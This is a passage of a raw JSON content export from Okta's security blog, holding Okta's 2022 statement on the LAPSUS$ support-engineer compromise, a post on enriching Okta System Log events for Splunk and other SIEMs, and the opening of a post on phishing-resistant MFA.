"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2022/03/official-okta-statement-lapsus-claims","id":"a5c2edd5-db0a-59ee-b411-b0e5d34c99c9","title":"Official Okta Statement on LAPSUS$ Claims","date":"2022-03-22T09:22:26+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last updated: 03/22/2022 12.00pm, Pacific Time\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Please note - Following this update all further information will be published at: \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta service has not been breached and remains fully operational. There are no corrective actions that need to be taken by our customers. In January 2022, Okta detected an unsuccessful attempt to compromise the account of a customer support engineer working for a third-party provider. As part of our regular procedures, we alerted the provider to the situation, while simultaneously terminating the user’s active Okta sessions and suspending the individual’s account. Following those actions, we shared pertinent information (including suspicious IP addresses) to supplement their investigation, which was supported by a third-party forensics firm.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Following the completion of the service provider’s investigation, we received a report from the forensics firm this week. The report highlighted that there was a five-day window of time between January 16-21, 2022, where an attacker had access to a support engineer’s laptop. This is consistent with the screenshots that we became aware of yesterday.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The potential impact to Okta customers is limited to the access that support engineers have. These engineers are unable to create or delete users, or download customer databases. Support engineers do have access to limited data - for example, Jira tickets and lists of users - that were seen in the screenshots. Support engineers are also able to facilitate the resetting of passwords and Multi Factor Authentication for users, but are unable to obtain those passwords.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are actively continuing our investigation, including identifying and contacting those customers that may have been impacted. There is no impact to Auth0 customers, and there is no impact to HIPAA and FedRAMP customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We take our responsibility to protect and secure our customers' information very seriously. We are deeply committed to transparency and will communicate additional updates when available.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Update (3/22/2022 2.15am, Pacific Time):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In late January 2022, Okta detected an attempt to compromise the account of a third-party customer support engineer working for one of our sub-processors.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The matter was investigated and contained by the sub-processor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We believe the screenshots shared online are connected to this January event. Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:47:43.253Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2022/06/unlocking-mystery-700-okta-system-log-events","id":"7b9d9959-811f-52fd-815e-bf1a1f79dfd7","title":"Unlocking the Mystery of 700+ Okta System Log Events","date":"2022-06-01T04:01:21+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Update 06-21-2022: Eleven new System Log events have been added to the \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/tree/Development\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Github project\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to bring the total number of cataloged events to a lucky 777.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When I started writing this post, there were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"766 potential System Log types\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that can appear in System Log, the logging platform in every Okta administrative console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By the time I finished it, there were 768. Things move fast in the cloud.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While the most important of these events are well documented already, the significance of others are only understood when you \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"look them up\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". There must be an easier way to enrich this data!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sending System Logs to a SIEM\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The native way to leverage Okta’s System Log is via the Okta Admin console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta offers numerous ways that System Log can be streamed, exported or programmatically queried. Many Okta customers send the log entries to their log management or SIEM of choice. These logs are provided in nicely formatted nested JSON. System Logs can either be ingested using the Okta System Log API or streamed using Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Streaming\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" service, and specific logs can also be sent to an external service using Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/concepts/event-hooks/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Hook\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" feature. Partners like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://databricks.com/blog/2022/04/07/analyzing-okta-logs-with-databricks-lakehouse-platform-to-detect-unusual-activity.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Databricks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have published blog entries on ingesting System Log data, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/Azure/Azure-Sentinel/blob/master/DataConnectors/Okta%20Single%20Sign-On/AzureFunctionOktaSSO_V2/AzureFunctionOktaSSO/run.ps1\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/ingestion/parser-list/okta_changelog\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have published Okta System Log connectors. Splunk has an entire \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://splunkbase.splunk.com/app/3682/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technical Add-On\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" devoted to Okta System Log, complete with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.splunk.com/Documentation/CIM/5.0.1/User/Overview\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Common Information Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" mapping.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Do You Use System Log?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve published a number of resources about Okta System Log to help customers understand the more important entries for security monitoring and common administrative tasks. For example, we have \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"write-ups\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on the events emitted by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/ti-index.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and on events that can be used to monitor for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/System-Log-queries-for-attempted-account-takeover?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"account takeover attempts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/global-search/%40uri?language=en_US#q=system%20log&t=Support&f:ContentTypeFacet=[Knowledge%20base]\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"search link\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" will allow you to see all Okta Knowledge Base articles that reference System Log - there are plenty more gems in there.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enriched System Log = Added Value\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many SIEM, security analytics, and log management solutions have ways of adding enrichment to events, either upon ingestion or upon query. Elastic does this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://medium.com/@carlosrpjunior/logstash-enrich-documents-using-data-from-different-index-615f67141981\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"upon ingestion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Microsoft Sentinel has the concept of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.microsoft.com/en-us/azure/sentinel/watchlists\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"watchlists\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and IBM’s QRadar provides \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.ibm.com/docs/en/qradar-on-cloud?topic=qradar-types-reference-data-collections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"reference data sets\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Google Chronicle offers both: via references or directly in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/ingestion/parser-list/supported-default-parsers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"parser\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" during ingestion - more about this later.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.splunk.com/Documentation/SplunkCloud/latest/Knowledge/Aboutlookupsandfieldactions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.sumologic.com/05Search/Search-Query-Language/Search-Operators/lookup\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sumo Logic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" call this functionality “lookup tables”. Since Okta maintains a Technical Add-On for Splunk (TA), I thought it might be helpful to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/tree/Development\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"extend the existing TA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to leverage a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/blob/Development/lookups/okta_system_log_lookup.csv\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom .csv lookup\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that provides significant additional enrichment to System Logs as you search them in Splunk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While this is designed for Splunk, the same methodology – and the same .csv file – should be applicable to many other SIEM/log management solutions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An important note!\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Splunk is, at the time of this writing, taking over responsibility from Okta for the Technical Add-On for Splunk. Once this new TA releases in the next month or two, I will evaluate it, and ensure that the .csv file above remains compatible, at which point I will update this post. Also, this new TA will be Splunk Cloud certified.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What Additional Information Do You Get?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As you search in Splunk for each of the System Log events defined in the .csv, this solution enriches them automatically with the following new fields, using the field format_event_type as a matching key.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"event_type_description\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The full-text description of the event.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"event_type_tags\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The various tags (pipe-delimited) that the event is categorized under, such as “admin” or “oauth2” or “workflows.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"admin_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": A field set to “1” if the event is pertaining to admin-level activity, such as the modification of an email template, or the creation of an app sign-on policy.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": A field set to “1” if the event has particular security interest, such as the identification of a threat within ThreatInsight, or the start of a support technician impersonation session. This incorporates, and extends, the Okta Events categorization found here. (Note: events can be of both admin and security interest.)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"legacy_event_types\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The various former event types that mapped to this event, pipe-delimited.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once this lookup is loaded into Splunk, it can be viewed quickly via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.splunk.com/Documentation/Splunk/8.2.6/SearchReference/Inputlookup\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"inputlookup\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" command, as shown below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4PMcCaRBswZpkepQiwRnxx\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk console, using inputlookup command\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Leveraging the Additional Info\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this lookup in place, Okta admins or security personnel searching this data in Splunk no longer have to pivot out of Splunk and view Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Type Catalog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to understand what an event means, or if it is of admin and/or security interest. Reports, dashboards, and detections can be created leveraging these new fields. Security teams in particular can easily build dashboards of Okta events that are of interest to them, and can create alerts or “notable events” from particularly important security events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As an example to get you started, also provided at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/tree/Development\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"GitHub link\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" above is a usable dashboard that displays all events of admin or security interest. Multi-select dialogs at the top of the dashboard allow the viewer to select event categories and tags of interest, as well as free-form search the events returned. Here’s a screencap!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4JSffAVvKgAYwA5VonXu4B\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample Dashboard, using enriched events of interest\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“That’s Nice. But We Don’t Use Splunk….”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you don’t use Splunk, you may still leverage the .csv file in order to build your own parser or reference table for the SIEM or log management platform of your choice. We reached out to our friends at Google Cloud Security, who took the .csv file and built it into a new version of the parser that brings Okta System Logs into Google Chronicle.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle feeds operate much the same as feeds in any other SIEM. However, the capabilities and goals diverge quickly once the data is ingested. In Chronicle, the parser adds metadata fields and populates the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/reference/udm-field-list\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Data Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" fields needed for Chronicle operations to happen on the data. This happens at ingest time, so any time dependent data are added to the meta of that log and are able to persist over the life of the log. If we were to change the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"event_type_description\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" of a log at a later date, the values would remain the same for older logs and be updated for new logs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Operating within Chronicle, you can use both raw and structured search. When combined with the new fields \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"admin_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", structured search allows the operator to quickly select only the relevant logs using Procedural Filtering combined with Prevalence on domain, user, or asset occurrence. Without using a search language, the operator can also find the most frequently occurring username generating logs of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". For more information on enrichment, check out the Chronicle documentation on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/investigation/investigate-user\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"user investigation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I hope this foray into enrichment methods helps you get even more use out of this valuable resource.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you create dashboards based on the additional fields, feel free to create a pull request against the Github project so that we can include it in the repo.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And if you create enrichment capabilities for another SIEM, I’d love to hear about it - please DM me at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://twitter.com/james_brodsky\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"@james_brodsky\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:46:01.440Z","secAuthor":[{"id":"94d5712c-dbae-5810-960d-1cd7db5eaec6","bio":{"bio":"I serve as a global resource for Okta’s high-growth solutions engineering organization. I have been at Okta since January, 2022 - but I’m no stranger to the industry! My team brings our customers a better awareness of Okta’s capabilities when it comes to protecting employees and business, increasing your security posture and giving your customers a frictionless-but-safe experience as they interact with you digitally.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4S4G7LW5dJLeo3NJyYOBAr/489a0430a1099f23b7a480286a9e1d3f/james_brodsky_okta.png"},"name":"James Brodsky","jobTitle":"Senior Director, Systems Engineering","slug":"james-brodsky","node_locale":"en"}]},{"slug":"/articles/2022/09/phishing-resistance-and-why-it-matters","id":"35a1dca1-f3ac-5389-b641-5b224f6c05a7","title":"Phishing Resistance and Why it Matters","date":"2022-09-22T20:47:16+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the wake of recent security events at Uber and Twilio, organizations are understandably interested in pivoting to authenticators that offer the most resistance to phishing attacks. So what is phishing resistance, and why does it matter?\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential theft remains the primary means by which attackers gain unauthorized access to systems. In 2021, over 80 percent of successful attacks on web applications stemmed from credential-based attacks such as phishing, credential stuffing and password sprays. According to the not-for-profit Anti-Phishing Working Group, the first quarter of 2022 saw the highest rate of phishing attacks \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.apwg.org/reports/apwg_trends_report_q1_2022.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"on record (pdf)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", with financial services and cloud service providers being targeted the most often.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-factor authentication (MFA) remains the most effective form of protection against all forms of credential theft. MFA limits what an adversary can do with a stolen password, and creates numerous detection opportunities when an adversary attempts to bypass it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By definition, MFA should include authenticators with more than two of the following properties:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"something you know (a knowledge factor)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"something you have (a possession factor)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"something you are (an inherence factor)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are 